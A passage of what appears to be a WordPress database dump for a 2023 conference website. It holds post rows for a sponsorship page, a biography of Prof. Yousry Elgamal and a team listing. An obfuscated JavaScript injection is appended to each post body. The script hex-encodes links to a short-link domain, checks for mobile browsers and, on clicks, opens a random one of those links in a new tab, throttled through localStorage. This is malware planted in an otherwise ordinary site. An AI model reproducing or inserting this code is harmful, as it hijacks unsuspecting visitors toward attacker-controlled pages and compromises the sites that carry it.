)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-03-23 03:51:58','2023-03-23 03:51:58','',2920,'https://gsw2023.com/?p=3942',0,'revision','',0),
(3943,1,'2022-01-28 14:10:42','2022-01-28 14:10:42','<!-- wp:paragraph -->\n<p><strong><em>Former Minister of Education, Egypt</em></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><em>Prof. of Computer Engineering</em></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><em>Chairman of Computer Scientific Society</em></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><em>Senior Advisor, AASTMT</em></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><strong><em>Chairman, Information &amp; Communication Committee at the National Committee of Education, Culture, and Science (UNESCO, ALECSO, ISESCO)</em></strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Prof. Yousry Elgamal, Professor of Computer Engineering, senior advisor at The Arab Academy for Science and Technology, and Chairman of The Computer Scientific Society (CSS), Alexandria-Egypt.&nbsp; He served as The Minister of Education of Egypt 2005-2010, Chairman, Board of Trustees, Egypt Japan University of Science and Technology (E-JUST) 2010-2014, and the senior consultant of the National Telecommunications Institute of Egypt. He is a member of the group of experts preparing The Global Knowledge Index, and The Chairman of The Information and Communication Committee at The National Committee of Education, Culture, and Science (UNESCO, ALECSO, ISESCO)</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Elgamal has also served in a number of capacities at The Arab Academy for Science and Technology and Maritime Transport including Vice-President for Education and Research, Founding Dean of College of Engineering and Technology, Founding Chairman of Electronics and Communication Department, and Assistant to the President for Informatics.&nbsp; He served also as a Lecture of Nuclear Electronics at The Atomic Energy Agency (IAEA).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He received his B.Sc. in Electrical Engineering from the University of Alexandria 1968, his M.Sc. form Ain-Shams University 1977.&nbsp; Prof. Elgamal holds a D.Sc. in Computer Science from the George Washington University 1985, and a recipient of Richard Merwin Award 1984. He is&nbsp; a board member of the Center of Special studies and Programs (CSSP) and the Center of Science and Planetarium, Bibliotheca Alexandrina. Dr. Elgamal is an active member of the Civil Society of Alexandria as a chairman of The Society of Friends of Music and Arts, and former president of The Yacht Club of Egypt in Alexandria.</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Prof. Dr. Yousry S. Elgamal','','publish','closed','closed','','yousry-s-elgamal','','','2023-04-02 07:20:08','2023-04-02 07:20:08','',0,'https://gsw2023.com/?post_type=dt_team&#038;p=3943',0,'dt_team','',0),
(3944,1,'2023-03-28 14:20:51','2023-03-28 14:20:51','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"100px\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"66, 75\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new 